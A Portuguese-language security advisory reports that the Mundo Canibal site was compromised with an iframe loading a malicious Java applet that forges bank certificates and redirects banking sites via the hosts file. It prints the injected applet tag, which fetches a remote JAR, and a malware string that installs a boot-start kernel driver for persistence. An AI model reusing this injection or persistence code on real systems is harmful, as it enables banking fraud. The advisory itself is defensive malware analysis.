A Linha Defensiva detectou um código malicioso na página principal do site Mundo Canibal na noite deste sábado (11/12). O código, um iframe, fazia com que o navegador executasse um applet Java malicioso. Usuários que tinham o Java ativado se depararam com uma mensagem do navegador solicitando que fosse executado o aplicativo inseguro, semelhante a imagem abaixo:
A mensagem de alerta do Java, solicitando permissão para executar o vírus.
O usuário que clicar em “Executar” ou “Run” será imediatamente infectado, apesar de estar em um site legítimo. Após a infecção, o vírus falsifica os certificados de segurança para exibir o cadeado SSL em páginas de banco redirecionadas. Tentar o acesso ao internet banking de alguns bancos a partir do computador infectado resultará no roubo de dados e, como consequência, numa fraude bancária.
A Linha Defensiva recomenda que o Java seja desativado, porque poucos sites necessitam dele atualmente e ele está envolvido em muitos ataques. Veja como fazer isso no final dessa reportagem do G1.
Informações técnicas
O código inserido na página inicial apontava para outra página hospedada no próprio site Mundo Canibal. Ela fazia com que o navegador executasse o applet malicioso, com o seguinte código:
<applet name=”Mundo Canibal IMPORTANTE: (Para executar corretamente o site clique em `Run.)” code=”le.class” archive=”http://mundocanibal.uol.com.br/includes/extras/eventos/17/fotos/dtm.jar” width=0 height=0><param value=””></applet>
Ao permitir a execução de tal aplicativo, o navegador fazia com que o arquivo le.class (um dos arquivos integrantes do arquivo principal, dtm.jar) realizasse uma série de atividades a fim infectar o computador.
Certificados falsificados para sites de bancos no Firefox.
Uma delas é forjar certificados utilizados pelo Firefox de algumas instituições bancárias, alterando o arquivo cert_override.txt do navegador da Mozilla. Em recente reportagem para o G1, Altieres Rohr identificou programas maliciosos capazes de alterar certificados de segurança, semelhante ao que este applet que estava no site Mundo Canibal faz. Outra instrução realizada pelo applet era a criação de outras entradas forjadas, no Registro do Windows, através de um arquivo .reg criado na infecção.
O mesmo applet alterava o arquivo Hosts para redirecionar o navegador a páginas maliciosas sempre que o internet banking de algumas instituições financeiras for acessado.
O vírus ainda criava um arquivo no computador na pasta C:WINDOWSsystem32drivers, com o nome actusb.sys, sendo o mesmo executado como um serviço do sistema (driver), como pode ser observado nas strings analisadas:
cmd /c sc create actusb binPath= “system32driversactusb.sys” group= “Act Group” type= kernel start= boot error= normal DisplayName= “ACtUsb”
Isso fazia com que o serviço fosse iniciado automaticamente, a cada reinicialização do sistema.
Segundo a análise feita do arquivo no VirusTotal, ele não é detectado pela maioria dos antivírus, pelo menos em seus mecanismos de assinatura, demonstrando a fragilidade dos programas de segurança em face da criação de novos programas maliciosos.
O site Mundo Canibal foi alertado imediatamente, fazendo com que os arquivos fossem prontamente retirados do ar algumas horas após o ocorrido.
Linha Defensiva 
Todos nós estamos sujeitos a esse tipo de coisa no mundo virtual. Mais é impressionante como uma empresa como o UOL que vende “segurança” deixa isso acontecer. É decepcionante.
CurtirCurtir